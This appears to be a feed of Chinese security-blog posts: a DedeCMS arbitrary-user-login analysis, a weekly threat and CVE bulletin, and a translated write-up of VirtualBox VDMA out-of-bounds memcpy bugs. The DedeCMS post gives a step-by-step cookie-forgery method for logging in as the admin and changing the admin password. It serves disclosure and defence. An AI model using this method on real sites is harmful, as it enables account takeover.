先来看一下DedeCMS判断登录用户的逻辑
include/memberlogin.class.php:292

function IsLogin()
{
    if($this-&gt;M_ID &gt; 0) return TRUE;
    else return FALSE;
}

跟进$this->M_ID看一下，170行

$this-&gt;M_ID = $this-&gt;GetNum(GetCookie("DedeUserID"));

GetNum()include/memberlogin.class.php:398

/**
*  获取整数值
*
* @access    public
* @param     string  $fnum  处理的数值
* @return    string
*/
function GetNum($fnum){
    $fnum = preg_replace("/[^0-9\.]/", '', $fnum);
    return $fnum;
}

正则匹配，去除了数字以外的字符，这里就可以构造一个利用点，一会儿再看

看一下GetCookie()
include/helpers/cookie.helper.php:54

GetCookie

关键点在这个判断条件

if($_COOKIE[$key.'__ckMd5'] != substr(md5($cfg_cookie_encode.$_COOKIE[$key]),0,16))

就是说从cookie中取到DedeUserID__ckMd5值，与md5($cfg_cookie_encode.$_COOKIE[$key])取前16位比较，相等才能进行下一步

我们知道admin的DedeUserID为1，现在需要知道DedeUserID__ckMd5的值

其实再思考一下，就算我们不知道admin的DedeUserID__ckMd5值，只要能过这个if条件就能绕过接着往下走了，那我们可不可以利用其他用户来绕过if条件呢？

在本程序中从数据库取用户的过程其实很简单，就是简单的查询语句Select * From #@__member where mid='$mid'。当我们利用其他用户的cookie通过了上面的if判断，然后修改mid为admin的id(1)，就可以从前台登录到admin账户。
那么如何在请求过程中修改DedeUserID的值让它能和admin的id相等呢？

利用点一

我们使进入GetNum方法的参数为数字1+字母的形式，经过正则替换就会变成1，也就是$this->M_ID的值，然后带入数据库查询

GetNum
$fnum为1qqqq的情况，经过正则替换后值成为了1

利用点二

在include/memberlogin.class.php:178有这么一行代码

$this-&gt;M_ID = intval($this-&gt;M_ID);

对$this->M_ID进行了整数类型转换，假设注册一个用户名，经过intval转换后为1就能使查询条件变成Select * From #@__member where mid='1'，也就取出了管理员在dede_member表里的密码，此时配合上一个漏洞，我们已经修改了dede_member中管理员的密码，只要在前台再进行一次修改密码操作，就能真正修改admin的密码。

intval
这是调试的时候注册用户名为0000001的情况，经过intval转换后M_ID的值变成了1

下面看一下如何从前台登录admin账户

在index.php里有一个最近访客记录的功能，

else
{
    require_once(DEDEMEMBER.'/inc/config_space.php');
    if($action == '')
    {
        include_once(DEDEINC."/channelunit.func.php");
        $dpl = new DedeTemplate();
        $tplfile = DEDEMEMBER."/space/{$_vars['spacestyle']}/index.htm";

        //更新最近访客记录及站点统计记录
        $vtime = time();
        $last_vtime = GetCookie('last_vtime');
        $last_vid = GetCookie('last_vid');
        if(empty($last_vtime))
        {
            $last_vtime = 0;
        }
        if($vtime - $last_vtime &gt; 3600 || !preg_match('#,'.$uid.',#i', ','.$last_vid.',') )
        {
            if($last_vid!='')
            {
                $last_vids = explode(',',$last_vid);
                $i = 0;
                $last_vid = $uid;
                foreach($last_vids as $lsid)
                {
                    if($i&gt;10)
                    {
                        break;
                    }
                    else if($lsid != $uid)
                    {
                        $i++;
                        $last_vid .= ','.$last_vid;
                    }
                }
            }
            else
            {
                $last_vid = $uid;
            }
            PutCookie('last_vtime', $vtime, 3600*24, '/');
            PutCookie('last_vid', $last_vid, 3600*24, '/');

else条件是当访问页面http://127.0.0.1/dedecms/uploads/member/index.php?uid=1111传入的uid不为空时进入

当我们传入的last_vid为空的时候，$last_vid = $uid;而uid是我们能控制的，所以我们就能控制传给PutCookie的参数，进入PutCookie方法

if ( ! function_exists('PutCookie'))
{
    function PutCookie($key, $value, $kptime=0, $pa="/")
    {
        global $cfg_cookie_encode,$cfg_domain_cookie;
        setcookie($key, $value, time()+$kptime, $pa,$cfg_domain_cookie);
        setcookie($key.'__ckMd5', substr(md5($cfg_cookie_encode.$value),0,16), time()+$kptime, $pa,$cfg_domain_cookie);
    }
}

在这里设置了last_vid__ckMd5的值

所以攻击流程已经明确了

注册一个普通用户，用户名满足数字1+字母的形式，或者经过intval()后值为1
访问用户主页，记录cookie中last_vid__ckMd5的值
访问index页面，替换cookie中DedeUserID和DedeUserID__ckMd5的值，替换成我们注册的用户名和last_vid__ckMd5，就能登录到前台admin

0x03 漏洞利用

前台注册普通用户，这里注册一个1qqqq
访问/member/index.php?uid=1qqqq，获取last_vid__ckMd5的值
访问/member/index.php，替换DedeUserID和DedeUserID__ckMd5的值

可以发现以admin身份成功登录到了前台
同样的，修改密码访问member/edit_baseinfo.php，还是要修改cookie值

原登录密码就是我们利用上一个漏洞修改的密码，也就是dede_member表中的admin密码，这样就达到了真正修改admin的密码

更新数据库的时候判断如果是管理员，就更新admin表中的数据

0x04 总结

这回有两处可导致判断条件的绕过，有时候一个漏洞影响力有限的时候也不能轻视，往往配合另一处缺陷就可以造成很大的危害

0x05 防护

暂时关闭会员注册功能，管理员设置安全问题，关注官方更新补丁及时升级

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/dedecms-loophole-2/

Tags: DedeCMS, 任意用户登陆, 漏洞分析, 绿盟科技

↧

绿盟科技网络安全威胁周报 201803

January 21, 2018, 11:22 pm

≫ Next: 【翻译】Oracle VirtualBox虚拟机逃逸漏洞分析

≪ Previous: DedeCMS最新版前台任意用户登录漏洞分析

一. 互联网安全威胁态势

1.1 CVE统计

最近一周CVE公告总数与前期相比数量有所上升。

1.2 威胁信息回顾

标题：OnePlus denies checkout page hack amid credit card fraud reports
- 时间：2018-01-15
- 摘要：OnePlus, a Shenzhen based Chinese smartphone manufacturer has denied that its checkout page was compromised due to a Magento bug. The statement from OnePlus came in response to a number of customers who reported credit card fraud and purchases after buying OnePlus smartphones from its official website (OnePlus.net) between October and December 2017.
- 链接：https://www.hackread.com/oneplus-denies-checkout-page-hack-credit-card-fraud/
标题：戳穿骗局！是谁“制造”了微处理器CPU skyfall漏洞和solace漏洞？
- 时间：2018-01-19
- 摘要：近日又有消息称，英特尔Meltdown和Spectre漏洞补丁风波还在延续，又有了skyfall漏洞和solace漏洞，还做了两个网站（怀疑有可能用于网络钓鱼，就不用文本表述网站地址了，截图如下）
- 链接：http://toutiao.secjia.com/skyfall-solace-fakenews
标题：美特朗普签署外国情报监控法FISA
- 时间：2018-01-22
- 摘要：cnbeta称据外媒报道，当地时间1月19日，美特朗普总统宣布他已经在对《外国情报监控法（FISA）第702条修改再授权法》上签名，也就是说，这个备受争议的新监控条款成为法律。获悉，最新授权将在2023年12月到期。
- 链接：http://toutiao.secjia.com/signed-fisa-702
标题：2.5万软件集成平台Jenkins暴露在互联网大量敏感证书及日志泄露
- 时间：2018-01-22
- 摘要：研究人员表示，没有利用任何软件集成平台 Jenkins 漏洞，就在互联网上发现了暴露 2万5千个Jenkins实例，从这些实例中发现了不少大型公司泄露了敏感证书和日志文件，这都可能会引发数据泄露事件。
- 链接：http://toutiao.secjia.com/jenkins-databreach
标题：DNS Servers Crash Due to BIND Security Flaw
- 时间：2018-01-17
- 摘要：Updates released by the Internet Systems Consortium (ISC) for BIND patch a remotely exploitable security flaw that has caused some DNS servers to crash.
- 链接：http://www.securityweek.com/dns-servers-crash-due-bind-security-flaw?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29
标题：DedeCMS最新版前台任意用户登录漏洞分析
- 时间：2018-01-21
- 摘要：DedeCMS最近又有一个缺陷被爆出来，可以绕过一些判断条件从而导致前台任意用户登录，配合上一个重置密码漏洞，可以达到从前台登录管理员账户并修改dede_admin表里的密码，也就是真正修改了管理员密码。下面来简单分析一下
- 链接：http://blog.nsfocus.net/dedecms-loophole-2/
标题：新型KillDisk变种攻击拉丁美洲金融机构
- 时间：2018-01-17
- 摘要：近日，一种新型的KillDisk变种攻击被发现，该攻击主要针对拉丁美洲地区的金融机构。经初步研究表明，该攻击可能是另一个有效载荷的一部分，或者背后存在着更大规模的攻击。
- 链接：http://blog.nsfocus.net/new-killdisk/
标题：ATTACKERS USE MICROSOFT OFFICE VULNERABILITIES TO SPREAD ZYKLON MALWARE
- 时间：2018-01-17
- 摘要：Spam campaigns delivering Zyklon HTTP malware are attempting to exploit three relatively new Microsoft Office vulnerabilities. The attacks are targeting telecommunications, insurance and financial service firms.
- 链接：https://threatpost.com/attackers-use-microsoft-office-vulnerabilities-to-spread-zyklon-malware/129503/
标题：GOOGLE AWARDS RECORD $112,500 BOUNTY FOR ANDROID EXPLOIT CHAIN
- 时间：2018-01-18
- 摘要：Prolific bug hunter Guang Gong has earned the highest-ever payout for a vulnerability in the history of Google’s Android Security Rewards program, which began in 2015.
- 链接：https://threatpost.com/google-awards-record-112500-bounty-for-android-exploit-chain/129519/
标题：GOOGLE CHROME ONCE AGAIN TARGET OF MALICIOUS EXTENSIONS
- 时间：2018-01-16
- 摘要：Researchers at network security vendor ICEBRG recently discovered four malicious extensions in the official Google Chrome Web Store with a combined user count of more than 500,000, and as with past incidents, the implications are serious for both consumers and enterprises.
- 链接：https://threatpost.com/google-chrome-once-again-target-of-malicious-extensions/129443/
标题：New Mirai Okiru Botnet targets devices running widely-used ARC Processors
- 时间：2018-01-15
- 摘要：Although the original creators of Mirai DDoS botnet have already been arrested and jailed, the variants of the infamous IoT malware are still in the game due to the availability of its source code on the Internet.
- 链接：https://thehackernews.com/2018/01/mirai-okiru-arc-botnet.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29
标题：Powerful Skygofree spyware was reported in November by Lukas Stefanko and first analyzed by CSE CybSec
- 时间：2018-01-16
- 摘要：The Skygofree spyware analyzed by Kaspersky today was first spotted by the researcher Lukas Stefanko and the first analysis was published last year by the CSE Cybsec ZLab.
- 链接：http://securityaffairs.co/wordpress/67815/malware/skygofree-surveillance-software.html
标题：LeakedSource Founder Arrested for Selling 3 Billion Stolen Credentials
- 时间：2018-01-16
- 摘要：Canadian authorities have arrested and charged an Ontario man for operating a website that collected ‘stolen’ personal identity records and credentials from some three billion online accounts and sold them for profit.
- 链接：https://thehackernews.com/2018/01/leakedsource-operator-charged.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29
标题：New BitTorrent Flaw Puts Linux & Windows devices at risk of hacking
- 时间：2018-01-16
- 摘要：Tavis Ormandy, an IT security researcher at Google’s Project Zero has identified a critical flaw in Transmission BitTorrent app that if exploited lets attackers take full control of a targeted computer on Linux or Windows operating system.
- 链接：https://www.hackread.com/bittorrent-flaw-linux-windows-devices-hacking/
标题：Facebook Password Stealing Apps Found on Android Play Store
- 时间：2018-01-18
- 摘要：Even after many efforts made by Google last year, malicious apps always somehow manage to make their ways into Google app store.
- 链接：https://thehackernews.com/2018/01/facebook-password-hacking-android.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29
标题：Booby-Trapped Messaging Apps Used for Spying: Researchers
- 时间：2018-01-18
- 摘要：An espionage campaign using malware-infected messaging apps has been stealing smartphone data from activists, soldiers, lawyers, journalists and others in more than 20 countries, researchers said in a report Thursday.
- 链接：http://www.securityweek.com/booby-trapped-messaging-apps-used-spying-researchers?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29
标题：2018网络安全发展趋势 2018勒索软件7大预测
- 时间：2018-01-18
- 摘要：2018网络安全发展趋势我们说了不少，但2018年勒索软件又会如何变化？当您得知大多数勒索软件受害者，都选择支付赎金恢复其数据，你可能会感到惊讶。例如， SamSam勒索软件攻击美国某医院，院方被迫支付赎金5万多美元
- 链接：http://toutiao.secjia.com/2018-ransomware-predictions
标题：2018网络安全规划：金融网络安全建设方案（含方法和内容）
- 时间：2018-01-19
- 摘要：金融企业是指执行业务需要取得金融监管部门授予的金融业务许可证的企业。其中，执业需取得证券业务许可证的证券公司、期货公司和基金管理公司等，与银行类一样，同属于国家重要信息系统范围。相较于银行类金融企业网络安全工作，证券类金融企业在网络安全的整体建设方面存在一些差异。首先，时间维度来看，证券类存在明显的交易时间段与非交易时间段，交易时间段的网络、系统可用性要求很高。系统维度来看，证券类相对较集中，对外服务的重要系统以交易WEB平台和交易APP为主。归结到安全威胁维度，由于存在交易时段和资金交易，证券类面对拒绝服务攻击、网络入侵、和数据窃取威胁，如具有 APT （高级持续性威胁）特性的“基金幽灵”威胁。
- 链接：http://toutiao.secjia.com/2018-fin-securityplan

（数据来源：绿盟科技威胁情报与网络安全实验室收集整理）

二. 漏洞研究

2.1 漏洞库统计

截止到2018年1月19日，绿盟科技漏洞库已收录总条目达到38680条。本周新增漏洞记录59条，其中高危漏洞数量1条，中危漏洞数量26条，低危漏洞数量32条。

Cisco WebEx Network Recording Player缓冲区溢出漏洞（CVE-2018-0103）
- 危险等级:中
- BID:102369
- cve编号:CVE-2018-0103
ImageMagick拒绝服务漏洞（CVE-2017-1000445）
- 危险等级:中
- BID:102368
- cve编号:CVE-2017-1000445
Google Android多个Qualcomm组件安全漏洞
- 危险等级:低
- BID:102386
- cve编号:CVE-2017-14911,CVE-2017-14906,CVE-2017-14912,CVE-2017-14913,CVE-2017-14915,CVE-2017-11010
Google Android NVIDIA组件权限提升漏洞(CVE-2017-0869)
- 危险等级:低
- BID:102374
- cve编号:CVE-2017-0869
Cisco WebEx Network Recording Player远程代码执行漏洞（CVE-2018-0104）
- 危险等级:中
- BID:102382
- cve编号:CVE-2018-0104
Google Android Kernel组件权限提升及信息泄露安全漏洞
- 危险等级:低
- BID:102390
- cve编号:CVE-2017-13215,CVE-2017-13216,CVE-2017-13218
VMware vSphere Data Protection身份验证绕过漏洞（CVE-2017-15548）
- 危险等级:中
- BID:102352
- cve编号:CVE-2017-15548
IBM MQ 拒绝服务漏洞（CVE-2017-1557）
- 危险等级:低
- BID:102418
- cve编号:CVE-2017-1557
EMC Document Sciences xPression SQL注入漏洞（CVE-2017-14960）
- 危险等级:中
- BID:102419
- cve编号:CVE-2017-14960
Advantech WebAccess拒绝服务漏洞（CVE-2017-16728）
- 危险等级:低
- BID:102424
- cve编号:CVE-2017-16728
Advantech WebAccess栈缓冲区溢出漏洞（CVE-2017-16724）
- 危险等级:低
- BID:102424
- cve编号:CVE-2017-16724
Advantech WebAccess路径遍历漏洞（CVE-2017-16720）
- 危险等级:低
- BID:102424
- cve编号:CVE-2017-16720
Advantech WebAccess SQL注入漏洞（CVE-2017-16716）
- 危险等级:中
- BID:102424
- cve编号:CVE-2017-16716
Advantech WebAccess拒绝服务漏洞（CVE-2017-16753）
- 危险等级:低
- BID:102424
- cve编号:CVE-2017-16753
ImageMagick ReadDDSInfo拒绝服务漏洞（CVE-2017-1000476）
- 危险等级:中
- BID:102428
- cve编号:CVE-2017-1000476
ImageMagick ReadPWPImage内存泄露漏洞（CVE-2017-18008）
- 危险等级:低
- BID:102346
- cve编号:CVE-2017-18008
IBM Security Key Lifecycle Manager SQL注入漏洞（CVE-2017-1670）
- 危险等级:中
- BID:102429
- cve编号:CVE-2017-1670
IBM Security Key Lifecycle Manager 信息泄露漏洞（CVE-2017-1668）
- 危险等级:低
- BID:102430
- cve编号:CVE-2017-1668
IBM Security Key Lifecycle Manager 信息泄露漏洞（CVE-2017-1727）
- 危险等级:低
- BID:102432
- cve编号:CVE-2017-1727
ImageMagick ReadSIXELImage堆缓冲区溢出漏洞（CVE-2018-5248）
- 危险等级:低
- BID:102431
- cve编号:CVE-2018-5248
Malwarebytes Premium本地拒绝服务漏洞（CVE-2018-5279）
- 危险等级:中
- BID:102453
- cve编号:CVE-2018-5279
Palo Alto Networks PAN-OS信息泄露漏洞（CVE-2017-1784）
- 危险等级:低
- BID:102458
- cve编号:CVE-2017-1784
Palo Alto Networks PAN-OS跨站脚本漏洞（CVE-2017-15941）
- 危险等级:低
- BID:102446
- cve编号:CVE-2017-15941
Cisco Node-jose Library远程安全限制绕过漏洞（CVE-2018-0114）
- 危险等级:中
- BID:102445
- cve编号:CVE-2018-0114
Oracle WebLogic Server拒绝服务漏洞（CVE-2017-10352）
- 危险等级:中
- BID:102442
- cve编号:CVE-2017-10352
IBM Security Key Lifecycle Manager 信息泄露漏洞（CVE-2017-1665）
- 危险等级:低
- BID:102439
- cve编号:CVE-2017-1665
Oracle WebLogic Server未授权访问漏洞（CVE-2017-10334）
- 危险等级:低
- BID:102444
- cve编号:CVE-2017-10334
IBM Security Key Lifecycle Manager XML外部实体注入漏洞（CVE-2017-1666）
- 危险等级:低
- BID:102434
- cve编号:CVE-2017-1666
IBM Security Key Lifecycle Manager跨站脚本漏洞（CVE-2017-1673）
- 危险等级:低
- BID:102436
- cve编号:CVE-2017-1673
ImageMagick MontageImageCommand内存泄露漏洞（CVE-2017-18022）
- 危险等级:低
- BID:102346
- cve编号:CVE-2017-18022
F5 BIG-IP多个产品远程拒绝服务漏洞（CVE-2017-6134）
- 危险等级:中
- BID:102466
- cve编号:CVE-2017-6134
F5 BIG-IP多个产品远程拒绝服务漏洞（CVE-2017-6133）
- 危险等级:中
- BID:102467
- cve编号:CVE-2017-6133
Cisco Unified Communications Manager跨站脚本漏洞（CVE-2018-0118）
- 危险等级:中
- BID:102478
- cve编号:CVE-2018-0118
IBM Security Key Lifecycle Manager 信息泄露漏洞（CVE-2017-1664）
- 危险等级:低
- BID:102470
- cve编号:CVE-2017-1664
Linux Kernel本地释放后重利用内存破坏漏洞（CVE-2017-15129）
- 危险等级:中
- BID:102485
- cve编号:CVE-2017-15129
Huawei ME906S产品本地权限提升漏洞（CVE-2017-8185）
- 危险等级:中
- BID:102473
- cve编号:CVE-2017-8185
Rockwell Automation MicroLogix 1400 Controllers栈缓冲区溢出漏洞（CVE-2017-16740）
- 危险等级:中
- BID:102474
- cve编号:CVE-2017-16740
Malwarebytes Premium本地拒绝服务漏洞（CVE-2018-5271）
- 危险等级:中
- BID:102471
- cve编号:CVE-2018-5271
IBM Security Key Lifecycle Manager 信息泄露漏洞（CVE-2017-1669）
- 危险等级:低
- BID:102468
- cve编号:CVE-2017-1669
ImageMagick ReadPATTERNImage内存泄露漏洞（CVE-2018-5246）
- 危险等级:低
- BID:102469
- cve编号:CVE-2018-5246
Exiv2 ‘jp2image.cpp’远程拒绝服务漏洞（CVE-2018-4868）
- 危险等级:中
- BID:102477
- cve编号:CVE-2018-4868
VMware多个产品整数溢出漏洞（CVE-2017-4950）
- 危险等级:中
- BID:102490
- cve编号:CVE-2017-4950
VMware多个产品远程代码执行漏洞（CVE-2017-4949）
- 危险等级:中
- BID:102489
- cve编号:CVE-2017-4949
Apache Geode远程代码执行漏洞（CVE-2017-9795）
- 危险等级:中
- BID:102488
- cve编号:CVE-2017-9795
IBM Security Key Lifecycle Manager 目录遍历漏洞（CVE-2017-1671）
- 危险等级:低
- BID:102487
- cve编号:CVE-2017-1671
Linux Kernel ‘drivers/block/loop.c’本地拒绝服务漏洞（CVE-2018-5344）
- 危险等级:低
- BID:102503
- cve编号:CVE-2018-5344
ImageMagick ReadMATImage内存泄露漏洞（CVE-2017-18029）
- 危险等级:低
- BID:102519
- cve编号:CVE-2017-18029
Linux Kernel ‘net/rds/rdma.c’本地拒绝服务漏洞（CVE-2018-5333）
- 危险等级:低
- BID:102510
- cve编号:CVE-2018-5333
Linux Kernel ‘fs/userfaultfd.c’本地释放后重利用内存破坏漏洞（CVE-2017-15126）
- 危险等级:中
- BID:102516
- cve编号:CVE-2017-15126
Linux Kernel ‘mm/hugetlb.c’本地拒绝服务漏洞（CVE-2017-15127）
- 危险等级:低
- BID:102517
- cve编号:CVE-2017-15127
Atlassian JIRA IncomingMailServers 跨站脚本漏洞（CVE-2017-16862）
- 危险等级:低
- BID:102506
- cve编号:CVE-2017-16862
Linux Kernel ‘net/rds/rdma.c’本地拒绝服务漏洞（CVE-2018-5332）
- 危险等级:中
- BID:102507
- cve编号:CVE-2018-5332
Atlassian JIRA跨站脚本漏洞（CVE-2017-16864）
- 危险等级:低
- BID:102505
- cve编号:CVE-2017-16864
Wireshark WCP Dissector epan/tvbparse.c拒绝服务漏洞（CVE-2018-5336）
- 危险等级:中
- BID:102504
- cve编号:CVE-2018-5336
Wireshark WCP Dissector ‘epan/dissectors/packet-wcp.c’拒绝服务漏洞（CVE-2018-5335）
- 危险等级:中
- BID:102500
- cve编号:CVE-2018-5335
Wireshark IxVeriWave文件解析器拒绝服务漏洞（CVE-2018-5334）
- 危险等级:中
- BID:102499
- cve编号:CVE-2018-5334
ImageMagick ReadDCMImage内存泄露漏洞（CVE-2018-5357）
- 危险等级:低
- BID:102497
- cve编号:CVE-2018-5357
IBM Security Access Manager跨站脚本漏洞（CVE-2017-1533）
- 危险等级:低
- BID:102496
- cve编号:CVE-2017-1533
IBM Security Access Manager本地信息泄露漏洞（CVE-2017-1478）
- 危险等级:低
- BID:102502
- cve编号:CVE-2017-1478

（数据来源：绿盟科技安全研究部&产品规则组）

2.2 焦点漏洞

焦点漏洞
- Cisco WebEx Network Recording Player远程代码执行漏洞
- NSFOCUS ID
  - 38626
- CVE ID
  - CVE-2018-0104
- 受影响版本
  - Cisco WebEx Network Recording Player
- 漏洞点评
  - Cisco WebEx Meetings是思科推出的网络会议解决方案。Cisco WebEx Network Recording Player在处理特殊构造的ARF文件中存在安全漏洞，成功利用后可使攻击者在受影响系统上执行任意代码。目前厂商已经为此发布了一个安全公告（cisco-sa-20180103-warfp）以及相应补丁，请使用此产品的用户及时到厂商页面下载更新。

（数据来源：绿盟科技安全研究部&产品规则组）

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/nsfocus-report-201803/

Tags: 安全周报, 绿盟科技

↧

【翻译】Oracle VirtualBox虚拟机逃逸漏洞分析

January 25, 2018, 7:17 pm

≫ Next: 2017年国内恶意物联网IP分析

≪ Previous: 绿盟科技网络安全威胁周报 201803

本文介绍了两个近期公布的Virtual Box 虚拟机逃逸漏洞，问题存在于 Oracle VirtualBox 5.1.30和5.2-rc1中。漏洞的发现归功于独立安全研究人员Niklas Baumstark。目前漏洞已被提交至 Beyond Security 的 SecuriTeam。

厂商回应

Oracle已针对漏洞发布补丁。更多细节详见：http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html

CVE 编号：CVE: CVE-2018-2698

漏洞详情

漏洞存在于 VirtualBox 的核心图形框架（VBVA子组件）中，影响所有主机操作系统，在用户级VirtualBox主机进程中提供了任意读/写原语。

VirtualBox 模拟的VGA设备与一定数量的VRAM相关联，VRAM 在host（宿主机）上的 VM 进程中,以及 guest（客户机）内核内存中连续映射。VRAM 的一部分被用作通用的共享内存，用于 host 和 guest 之间的通信（host – guest shared memory interface，HGSMI）。借助这种共享内存机制，guest 可以向 host 发出某些命令，例如实现鼠标自动捕获和无缝窗口功能。guest 还可以通过一个名为 VDMA 的子系统，通知 host 代表其在VRAM内部复制数据。

1. vboxVDMACmdExecBpbTransfer 中存在的越界读写漏洞

VBOXVDMACMD_DMA_BPB_TRANSFER 结构体的定义如下（(详见 virtualbox 源码 \include\VBox\Graphics\VBoxVideo.h）：

typedef struct VBOXVDMACMD_DMA_BPB_TRANSFER
    {
        uint32_t cbTransferSize;
        uint32_t fFlags;
        union
        {
            uint64_t phBuf;
            VBOXVIDEOOFFSET offVramBuf;
        } Src;
        union
        {
            uint64_t phBuf;
            VBOXVIDEOOFFSET offVramBuf;
        } Dst;
    } VBOXVDMACMD_DMA_BPB_TRANSFER, *PVBOXVDMACMD_DMA_BPB_TRANSFER;

当发送一个类型为 VBOXVDMACMD_TYPE_DMA_BPB_TRANSFER 的 VDMA 命令时，这种类型的请求对象驻留在 HGSMI 堆中，并完全由 guest 控制。

在 host 上，一个指向该对象的指针最终被传递给\src\VBox\Devices\Graphics\DevVGA_VDMA.cpp 中的如下函数：

static int vboxVDMACmdExecBpbTransfer(PVBOXVDMAHOST pVdma, const PVBOXVDMACMD_DMA_BPB_TRANSFER pTransfer, uint32_t cbBuffer)
    {
        // ...
        uint32_t cbTransfer = pTransfer-&gt;cbTransferSize;
        uint32_t cbTransfered = 0;
        // ...
        do
        {
            uint32_t cbSubTransfer = cbTransfer;
            if (pTransfer-&gt;fFlags &amp; VBOXVDMACMD_DMA_BPB_TRANSFER_F_SRC_VRAMOFFSET)
            {
                // [[ Note 1 ]]
                pvSrc  = pvRam + pTransfer-&gt;Src.offVramBuf + cbTransfered;
            }
            else
            {
                // ...
            }

            if (pTransfer-&gt;fFlags &amp; VBOXVDMACMD_DMA_BPB_TRANSFER_F_DST_VRAMOFFSET)
            {
                // [[ Note 2 ]]
                pvDst  = pvRam + pTransfer-&gt;Dst.offVramBuf + cbTransfered;
            }
            else
            {
                // ...
            }

            if (RT_SUCCESS(rc))
            {
                memcpy(pvDst, pvSrc, cbSubTransfer);
                cbTransfer -= cbSubTransfer;
                cbTransfered += cbSubTransfer;
            }
            else
            {
                cbTransfer = 0; /* to break */
            }
            // ...
        } while (cbTransfer);

        if (RT_SUCCESS(rc))
            return sizeof (*pTransfer);
        return rc;
    }

以上代码中标注的 Note 1 和 Note 2 处， guest 控制的偏移量 pTransfer-> Src.offVramBuf 和 pTransfer-> Dst.offVramBuf ，与 VRAM 地址相加，没有进行任何验证或边界检查。在之后的 memcpy 中，size 来自一个 guest 可控的变量，pTransfer->cbTransferSize。

以上，获得了 memcpy(VRAM + X, VRAM + Y, Z) ，其中 X，Y，Z 可被 guest 控制。

2. vboxVDMACmdExecBpbTransfer 中存在的越界读写漏洞

VBOXVDMACMD_DMA_PRESENT_BLT 结构体定义如下：

typedef uint64_t VBOXVIDEOOFFSET;
    /* [...] */
    typedef struct VBOXVDMACMD_DMA_PRESENT_BLT
    {
        VBOXVIDEOOFFSET offSrc;
        VBOXVIDEOOFFSET offDst;
        VBOXVDMA_SURF_DESC srcDesc;
        VBOXVDMA_SURF_DESC dstDesc;
        VBOXVDMA_RECTL srcRectl;
        VBOXVDMA_RECTL dstRectl;
        uint32_t u32Reserved;
        uint32_t cDstSubRects;
        VBOXVDMA_RECTL aDstSubRects[1];
    } VBOXVDMACMD_DMA_PRESENT_BLT, *PVBOXVDMACMD_DMA_PRESENT_BLT;

当发送一个 VBOXVDMACMD_TYPE_DMA_PRESENT_BLT 类型的 VDMA 命令时，这种类型的请求对象会驻留在 HGSMI 堆中，并完全由 guest 控制。

在 host 上，一个指向该对象的指针最终被传递给 \src\VBox\Devices\Graphics\DevVGA_VDMA.cpp中的如下函数：

static int vboxVDMACmdExecBlt(PVBOXVDMAHOST pVdma, const PVBOXVDMACMD_DMA_PRESENT_BLT pBlt, uint32_t cbBuffer)
    {
        const uint32_t cbBlt = VBOXVDMACMD_BODY_FIELD_OFFSET(uint32_t, VBOXVDMACMD_DMA_PRESENT_BLT, aDstSubRects[pBlt-&gt;cDstSubRects]);
        Assert(cbBlt &lt;= cbBuffer);
        if (cbBuffer &lt; cbBlt) return VERR_INVALID_FUNCTION; /* we do not support stretching for now */ Assert(pBlt-&gt;srcRectl.width == pBlt-&gt;dstRectl.width);
        Assert(pBlt-&gt;srcRectl.height == pBlt-&gt;dstRectl.height);
        if (pBlt-&gt;srcRectl.width != pBlt-&gt;dstRectl.width)
            return VERR_INVALID_FUNCTION;
        if (pBlt-&gt;srcRectl.height != pBlt-&gt;dstRectl.height)
            return VERR_INVALID_FUNCTION;
        Assert(pBlt-&gt;cDstSubRects);  /* [[ Note 2 ]] */

        uint8_t * pvRam = pVdma-&gt;pVGAState-&gt;vram_ptrR3;
        VBOXVDMA_RECTL updateRectl = {0, 0, 0, 0};

        if (pBlt-&gt;cDstSubRects)
        {
            /* [...] */
        }
        else
        {
            /* [[ Note 1 ]] */
            int rc = vboxVDMACmdExecBltPerform(pVdma, pvRam + pBlt-&gt;offDst, pvRam + pBlt-&gt;offSrc,
                    &amp;pBlt-&gt;dstDesc, &amp;pBlt-&gt;srcDesc,
                    &amp;pBlt-&gt;dstRectl,
                    &amp;pBlt-&gt;srcRectl);
            AssertRC(rc);
            if (!RT_SUCCESS(rc))
                return rc;

            vboxVDMARectlUnite(&amp;updateRectl, &amp;pBlt-&gt;dstRectl);
        }

        return cbBlt;
    }

以上代码中标注的 Note 1 处， guest 可控的偏移 pBlt->offDst 和 pBlt->offSrc 与 VRAM 地址相加，没有进行任何验证或边界检查。

请注意，Note 2 中的 Assert 在生产版本中不可用，所以代码可以到达 else 分支。之后调用的 vboxVDMACmdExecBltPerform 在计算的地址之间执行一个memcpy：

static int vboxVDMACmdExecBltPerform(PVBOXVDMAHOST pVdma, uint8_t *pvDstSurf, const uint8_t *pvSrcSurf,
                                        const PVBOXVDMA_SURF_DESC pDstDesc, const PVBOXVDMA_SURF_DESC pSrcDesc,
                                        const VBOXVDMA_RECTL * pDstRectl, const VBOXVDMA_RECTL * pSrcRectl)
    {
        /* [...] /*
        if (pDstDesc-&gt;width == pDstRectl-&gt;width
                &amp;&amp; pSrcDesc-&gt;width == pSrcRectl-&gt;width
                &amp;&amp; pSrcDesc-&gt;width == pDstDesc-&gt;width)
        {
            Assert(!pDstRectl-&gt;left);
            Assert(!pSrcRectl-&gt;left);
            uint32_t cbOff = pDstDesc-&gt;pitch * pDstRectl-&gt;top;
            uint32_t cbSize = pDstDesc-&gt;pitch * pDstRectl-&gt;height;
            memcpy(pvDstSurf + cbOff, pvSrcSurf + cbOff, cbSize);
        }
        else
        {
            /* [...] /*
        }
        return VINF_SUCCESS;
    }

通过设置 pDstDesc-> pitch = 1，pDstRectl-> top = 0，可以得到 cbOff = 0 和 cbSize = pDstRectl-> height（这里同样是通过 guest 控制）。最后调用 memcpy（VRAM + X，VRAM + Y，Z），其中 X，Y，Z 可被 guest 控制。

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/oracle-virtualbox/

Tags: Oracle, VirtualBox, 漏洞分析, 绿盟科技

↧

2017年国内恶意物联网IP分析

January 26, 2018, 12:58 am

